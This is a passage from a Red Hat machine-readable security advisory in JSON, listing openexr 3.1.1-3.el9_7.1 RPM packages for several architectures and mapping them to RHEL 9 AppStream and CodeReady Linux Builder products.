"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_7.1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_7.1.ppc64le",
"product": {
"name": "openexr-0:3.1.1-3.el9_7.1.ppc64le",
"product_id": "openexr-0:3.1.1-3.el9_7.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_7.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"product_id": "openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_7.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_7.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_7.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_7.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"product_id": "openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_7.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_7.1.x86_64",
"product": {
"name": "openexr-0:3.1.1-3.el9_7.1.x86_64",
"product_id": "openexr-0:3.1.1-3.el9_7.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_7.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"product_id": "openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_7.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_7.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_7.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_7.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"product_id": "openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_7.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_7.1.i686",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.i686",
"product_id": "openexr-libs-0:3.1.1-3.el9_7.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_7.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_7.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_7.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_7.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_7.1.i686",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.i686",
"product_id": "openexr-devel-0:3.1.1-3.el9_7.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_7.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_7.1.s390x",
"product": {
"name": "openexr-0:3.1.1-3.el9_7.1.s390x",
"product_id": "openexr-0:3.1.1-3.el9_7.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_7.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"product_id": "openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_7.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_7.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_7.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_7.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"product_id": "openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_7.1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.src",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.src",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
